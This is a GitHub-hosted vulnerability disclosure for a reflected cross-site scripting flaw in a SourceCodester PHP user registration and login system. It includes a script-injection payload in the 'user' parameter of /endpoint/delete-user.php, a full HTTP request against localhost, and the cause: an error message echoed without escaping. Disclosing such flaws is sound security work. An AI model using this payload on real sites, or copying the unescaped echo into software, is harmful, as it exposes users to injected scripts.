Skip to content

Latest commit

 

History

History
32 lines (18 loc) · 960 Bytes

xss_delete_user.md

File metadata and controls

32 lines (18 loc) · 960 Bytes
Raw

User Registration and Login System by rems has xss (Reflected XSS)

BUG_Author: hlhyp

vendors: https://www.sourcecodester.com/php/16890/user-registration-and-login-system-using-php-source-code.html

Vulnerability File: /endpoint/delete-user.php

[+] payload: /endpoint/delete-user.php?user=1'"()%26%25<ScRiPt%20>alert(%27this%20has%20xss%27)</ScRiPt>

GET /endpoint/delete-user.php?user=1'"()%26%25<zzz><ScRiPt%20>alert(%27this%20has%20xss%27)</ScRiPt> HTTP/1.1
Referer: http://127.0.0.1/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: 127.0.0.1
Connection: Keep-alive

Alt text

Causes of vulnerabilities:

endpoint\delete-user.php -> line32 -> echo "Error: " . $e->getMessage();

echo error message without filtering resulted in xss